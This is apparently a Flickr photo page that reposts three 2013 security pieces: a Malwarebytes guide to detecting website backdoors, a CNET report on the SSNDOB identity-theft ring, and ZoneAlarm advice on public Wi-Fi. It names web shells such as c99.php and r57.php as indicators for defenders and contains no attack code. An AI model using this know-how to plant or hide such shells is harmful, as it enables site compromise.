Hacked !!!
Image by marsmet521
Log analysis .. When all else fails, log analysis can be your best friend. Think of log files as the black box investigators recover to find out more about an accident. Logs contain traces of all events that happened on your website, sorted out by timestamp.
There are two types of logs often mentioned: Apache’s access and error logs. Every time someone visits a page on your site, a record is created in your Apache’s access logs. The error logs show entries for commands that resulted in an error, often indicating malicious activity, such as trying to brute force a login page or performing a hack.
As you may imagine, log files can get really large, which makes searching them a real pain. There are tools such as OSSEC that make this process a little easier.
.
……..*****All images are copyrighted by their respective authors …….
.
… marsmet533 photo … Infection Blocked … Miami’s Ten Best Holiday Cocktails (Fri., Dec. 20 2013) …item 3.. LONDON CALLING: STACY MARTIN
www.flickr.com/photos/109937567@N06/11503866974/in/photos…
.
… marsmet533 photostream … Page 1
www.flickr.com/photos/109937567@N06/?details=1
.
.
……………………………………………………………………………………………………………………………………………………..
.
…..item 1)…. A Guide to Website Security …
… Malwarebytes Unpacked … blog.malwarebytes.org/ …
.
………………..
img code photo … Hacked!!!
cdn.blog.malwarebytes.org/wp-content/uploads/2013/06/hack…
………………..
.
… By Jerome Segura … June 17, 2013 … In Malware Intelligence
blog.malwarebytes.org/intelligence/2013/06/a-guide-to-web…
Having your own website is hard enough. In addition to adding content, trying to grow your audience, maintaining it, now you have to be cautious of malware possibly being spread through your beloved website?
According to Palo Alto Networks’s recent The Modern Malware Review, “90 percent of Unknown Malware [is] Delivered Via Web-Browsing.”
This confirms that most web-based infections fly under the radar for several hours/days before being detected by major antivirus products.
In our previous blog posts, we’ve discussed how web exploits affect end users’ machines and serve malicious payloads.
Let’s take a look behind the curtain on websites and web servers that house and serve malware and how to better protect your own website.
There are millions of websites and the process of getting your own is fairly trivial. Without a doubt the ease of deploying a website and relative low cost to own one is responsible for many of the security issues we face. While you may think of a website as a personal blog, e-commerce site or forum, the bad guys see it as a resource for many purposes:
… Hosting illegal/copyrighted files for free.
… Hosting malware, phishing and fake pharmaceutical pages.
… Sending spam (malware can run on a website just like it does on your desktop computer).
… Gaming Google’s SEO ranking algorithm by stuffing pages with backlinks.
… Performing Denial of Service attacks to knock other websites offline.
.
— Finding the flaw(s)
The dominant web server software is Apache, which runs on Linux. While there is a widely accepted belief that Linux is more secure than Windows, web servers are constantly hacked into by attackers ranging from script kiddies to professional pentesters.
Let’s review some of the most common reasons why websites get hacked:
.
— Stolen user credentials
You access your website by logging into a Control Panel or login page from your favorite blogging software such as WordPress. Occasionally, you may also use an FTP program to upload files. If malware is present on your computer, and it happens to be a keylogger or some other type of password stealer, everything you type, as well your configurations files, can be harvested and sent back to the bad guys. Similarly, logging into your website from a free Wi-Fi hotspot or insecure access point exposes your password.
.
— Weak passwords
Most attackers leave the default “admin” username and choose a password that is easy to guess by performing a technique known as a brute force attack. This consists of trying out hundreds of thousands of passwords until one matches. If you use a typical dictionary or a cute pet name, you might as well give the bad guys the keys to your house.
.
— Software vulnerabilities
Websites run multiple software programs in order to render pages, store customer data, etc. If those are poorly configured or outdated, a multitude of bugs can be exploited by a remote attacker to gain access to the system.
.
— Dangerous configurations
A very important aspect of Linux security is file permissions. However, it is a double-edged sword because, while if set properly, file permissions can make a site very secure, the opposite is true as well. Many people do not understand permissions well or simply disable them altogether in order to install a plugin that complained about restrictions. You can read more about file permissions in this blog post.
A popular attack method that has allowed countless script kiddies to deface websites and spread malware is called Remote File Inclusion (RFI). It consists of tricking the web server into thinking it should open a file as if it actually resides locally by passing specially crafted parameters into the URL. The remote file could be anything, but hackers will use scripts, also known as “shells’” (more on that later), to gain access and perform administrative operations directly on the website.
.
— Owning the box
The ultimate goal of an attacker is to completely own the target system, something known as being root. Unless you possess the administrative credentials, your local user account has very restricted permissions which do not allow you to alter core parts of the website to do as you please. Once again, web servers have enough vulnerabilities to exploit to elevate a user’s privileges to root.
For the most part, attackers will reuse publicly available exploits, perhaps tweak them a little bit to add their signature or a message to their friends. Even exploits that are several years old still work, which shows one of the big issues with website security: lack of security maintenance. There is also some confusion between the hosting provider and its customers regarding the patching process. Some providers will not perform upgrades for you, especially if you install your own Content Management System (WordPress, Joomla!, Drupal). There are many reasons for that:
… The cost: When you only pay a few dollars a month for web site hosting, your provider is not going to waste its time and money troubleshooting your site.
… The responsibility: If performing an update on your site breaks the database or other critical part, this is a pretty big responsibility to assume. Your hosting company is not a web development studio.
The problem is that most website owners wrongly assume everything is taken care of or that a website is for some reason “immune” to security problems.
.
— Prevention goes a long Way
… Only administer your website from a device you trust is free of malware. If you aren’t sure, why not run our Malwarebytes Anti-Malware program?
… Do not administer your site from a free Wi-Fi hotspot (i.e., your local StarBucks). If you must, please use a free or cheap VPN program to encrypt your connection.
… Keep your website up to date just like you would (or should) keep your computer patched up. If you use WordPress, the main dashboard will tell you when updates are available.
… If spending time to secure your site is not your cup of tea, you might want to pay a little more and do “managed hosting,” a turn-key solution where everything is taken care of for you.
… Use strong passwords and change them on a regular basis.
… Back up your site at least once a month.
For the more advanced users out there, let’s roll up our sleeves and dig deeper.
Web malware is quite different from what we see on the Windows platform. For one, there are many more scripts (as opposed to compiled binaries) which can be written in Perl, PHP, Python or simply in bash, the popular Unix shell language. Such scripts are also known as “backdoors or “shells,” since once uploaded onto a website (using for example the Remote File Inclusion we discussed earlier), they allow unfettered remote access.
A popular shell known as C99 lets an attacker browse the entire website’s content directly from its browser:
.
……………………
img code photo … !C99madshell v. 2.1 madset edition ADVANCED!
cdn.blog.malwarebytes.org/wp-content/uploads/2013/06/shel…
Figure 1: C99 Shell: A Hacker’s Favorite
……………………
.
In addition, this shell lets you delete and add files, dump the database and even change file permissions.
In almost all cases involving a site hack, you will a find a backdoor of some sort. It may not have a full graphical interface, but as long as it allows hackers remote access, that is more than enough to keep the site under their control. By nature, shells are very small in size and will try to hide in certain directories or, if that is not possible, will be in folders that have more laxed permissions, such as /images, simply because that was the easiest place to inject them.
.
— How to recognize a backdoor
… Accessing your files
If you are trying to hunt for malicious files, you will need to access your website internals. You can do so either by FTP, SFTP or SSH. FTP is the old-school way of uploading files using a client like FileZilla or CuteFTP. I recommend using SFTP instead, which supports encryption (as opposed to sending out your login credentials in the clear with FTP). By far the best way to access your web server is using the command line terminal through SSH. Keep in mind that it requires a certain understanding of Linux commands and can seem a little overwhelming. Finally, you can of course browse your files using your web hosting company’s control panel (Cpanel and Plesk to name two).
.
………………..
img code photo … Welcome, Demo Admin
cdn.blog.malwarebytes.org/wp-content/uploads/2013/06/ples…
Figure 2: The Plesk Control Panel
………………..
.
— File name patterns/location
Although not a very reliable approach, searching for malicious shells by name can yield some good results. Many hackers will not bother renaming the backdoor they uploaded. So if you see a file called c99.php or r57.php (two very popular backdoors), you are pretty much guaranteed it is bad. Another trick the bad guys use is to rename those files with another extension such as “.txt,” so keep an eye open for those as well (i.e., c99.php.txt, r57.php.txt).
Looking at folders where plugins or images normally reside can be quite revealing if you search for files that have no business being in there.
.
………………….
img code photo … Index of /images/uploaded_images
cdn.blog.malwarebytes.org/wp-content/uploads/2013/06/c99.png
Figure 3: A Backdoor Hiding Among Images
………………….
.
— File modification date
If your site was hacked recently but was fine say, a month ago, then you have something to work with: time stamps. Look for any file added or modified recently and treat is as suspicious.
.
— File permissions/ownership
As we talked about earlier, file permissions and ownership are crucial to keeping a website secure. At the same time, many backdoors that are uploaded will often show with unusual attributes or attributes that are once again “out of place” with other files around them. So if you see a file with “777” permissions, it should instantly raise a red flag. Please refer to this article to learn more about file permissions and ownership.
.
— File contents
A much more powerful method to identify backdoors is to search for patterns and strings within the files themselves. That is where knowledge of Linux commands such as grep comes into play. This, of course, relies on having a list of malicious strings or patterns that is kept up to date. In many ways, you could compare that to antivirus signatures and a malware database.
.
………………….
img code photo … $auth_pass
cdn.blog.malwarebytes.org/wp-content/uploads/2013/06/file…
Figure 4: Yet Another Backdoor Called FilesMan
………………….
.
— Log analysis
When all else fails, log analysis can be your best friend. Think of log files as the black box investigators recover to find out more about an accident. Logs contain traces of all events that happened on your website, sorted out by timestamp. There are two types of logs often mentioned: Apache’s access and error logs. Every time someone visits a page on your site, a record is created in your Apache’s access logs. The error logs show entries for commands that resulted in an error, often indicating malicious activity, such as trying to brute force a login page or performing a hack. As you may imagine, log files can get really large, which makes searching them a real pain. There are tools such as OSSEC that make this process a little easier.
If you are using your web host’s control panel, the logs may be located as illustrated below.
.
…………………..
img code photo … Folders
cdn.blog.malwarebytes.org/wp-content/uploads/2013/06/logs…
Figure 5: Control Panel Showing Apache Logs
…………………..
.
— Full website compromise
Injecting a backdoor on your site is just the first step in a long chain of events to follow. Once the attacker can control your server, it will want to carry out some sort of action. Note that most (if not all) site compromises are automated, meaning there is no human sitting at a terminal and hacking your particular site. Automated scripts are constantly probing the wire to hack anything that is vulnerable.
As mentioned before, your website can be leveraged to do all sorts of things. Let’s take a look at some of the most common motives and how it is done.
.
— Spam (AKA pharma hack)
It seems spam is here for the long haul. Few people know that pharmaceutical spam also affects websites. While it may not be visible to site owners, pharma spam is definitely found by search engines. All of the sudden, your website is pushing fake drugs and other dubious products. Not only is this going to use up a lot of bandwidth, it will put a website in Google’s blacklist with all the resulting consequences on search rankings.
.
.
.
.
…………………………………………………………………………………………………………………………………………………….
.
…..item 2)…. Hackers crack major data firms, sell info to ID thieves, says report …
… CNET … news.cnet.com/ …
CNET News Security & Privacy Hackers crack major data firms, sell info to …
An illegal, hacker-helmed identity-theft service called SSNDOB — as in Social Security Number and date of birth — compromises servers at several major US data brokers, according to a report.
by Edward Moyer | September 25, 2013 12:27 PM PDT
news.cnet.com/8301-1009_3-57604633-83/hackers-crack-major…
An illegal service that sells personal data “on any U.S. resident” — which can then be used for identity theft — hacked into servers at several major data aggregators including LexisNexis and Dun & Bradstreet, according to a report.
The service’s customers have, the report said, “spent hundreds of thousands of dollars looking up SSNs, birthdays, driver’s license records, and obtaining unauthorized credit and background reports on more than 4 million Americans.”
In an article Wednesday, former Washington Post reporter Brian Krebs, who now writes the KrebsOnSecurity blog, outlined how a site called Expose.su managed earlier this year to post financial information on celebrities and government officials.
.
……………….
img code photo … Security8
asset0.cbsistatic.com/cnwk.1d/i/tim2/2013/09/25/Security8…
……………….
.
The site’s activities triggered an FBI investigation, in part because Expose.su managed to publish the Social Security Number, address, and a credit report of then-FBI Director Robert Mueller.
According to Krebs, Expose.su (think “exposes you”) got its info from another site, ssndob.ms, or SSNDOB (think “Social Security Number” and “date of birth”), which got the data by way of a small botnet it operates. The botnet appears to have access to compromised servers at several large data brokers in the United States, including LexisNexis, Dun & Bradstreet, and Kroll Background America. (And, in regard to the bot program installed on the hacked servers, Krebs reported that “none of the 46 top antimalware tools on the market today detected it as malicious.”)
LexisNexis maintains one of the world’s biggest electronic databases for legal and public-records related information; Dun & Bradstreet licenses info on businesses for use in credit decisions; and Kroll — now a part of HireRight — provides services related to employment background, drug, and health screenings, Krebs noted.
“All three victim companies said they are working with federal authorities and third-party forensics firms in the early stages of determining how far the breaches extend, and whether indeed any sensitive information was accessed and exfiltrated from their networks,” Krebs said.
Krebs, who got his hands on a copy of SSNDOB’s database, reported that a closer examination of it indicates that since SSNDOB came on the scene early last year, the service has sold more than 1.02 million unique SSNs and nearly 3.1 million date of birth records.
SSNDOB markets itself on underground cybercrime forums, Krebs said, and sells data at prices that “range from 50 cents to .50 per record, and from to for credit and background checks.
Customers pay for their subscriptions using largely unregulated and anonymous virtual currencies, such as Bitcoin and WebMoney.” Krebs also said SSNDOB appears “to have licensed its system for use by at least a dozen high-volume users” and that there’s some evidence these users “are operating third-party identity theft services.”
The FBI confirmed that a bureau investigation into the SSNDOB server hacks is ongoing, Krebs reported, adding that a spokesperson wouldn’t provide any details.
You can read Krebs’ story here.
Topics:Cybercrime, Corporate and legal, Privacy and data protection, Hacks, Malware Tags:identity theft, hacking, data theft, enterprise security
.
.
About Edward Moyer
Edward Moyer is an associate editor at CNET News and a many-year veteran of the writing and editing world. He enjoys taking sentences apart and putting them back together. He also likes making them from scratch.
.
.
.
…………………………………………………………………………………………………………………………………………………….
.
….item 3)…. The Risks of Public Hotspots: How Free WiFi Can Harm You …
… ZoneAlarm Security Blog … www.zonealarm.com/blog/ … Secure Your Online World …
.
……………….
img code photo … Risks of Public WiFi
www.zonealarm.com/blog/wp-content/uploads/2013/11/Risks-o…
……………….
.
Posted on November 20, 2013 by ZoneAlarm
www.zonealarm.com/blog/2013/11/the-risks-of-public-hotspo…
Practically anywhere you go, you’ll come across public WiFi hotspots. However, this free service could spell trouble. We explore the security risks of public hotspots and what to consider before connecting to public WiFi.
.
…………………
img code photo … Risks of Public WiFi
www.zonealarm.com/blog/wp-content/uploads/2013/11/ZoneAla…
…………………
.
* = Turn on two-factor authentication for your accounts
• How to Turn on Two-factor Authentication for Your Email Accounts
• How to Turn on Login Approvals on Facebook
• How to Turn on Two-step Verification for Your LinkedIn Account
.
This entry was posted in Mobile Security, Online Privacy, PC security and tagged data packet sniffer, hack, hacker, ID theft, identity theft, Internet cafe, man in the middle, MITM, rogue network, unsecured Wi-Fi, unsecured WiFi, VPN, Wi-Fi, WiFi, wireless by ZoneAlarm. Bookmark the permalink.
.
.
.
……………………………………………………………………………………………………………………………………………………..
.
.
.
(686)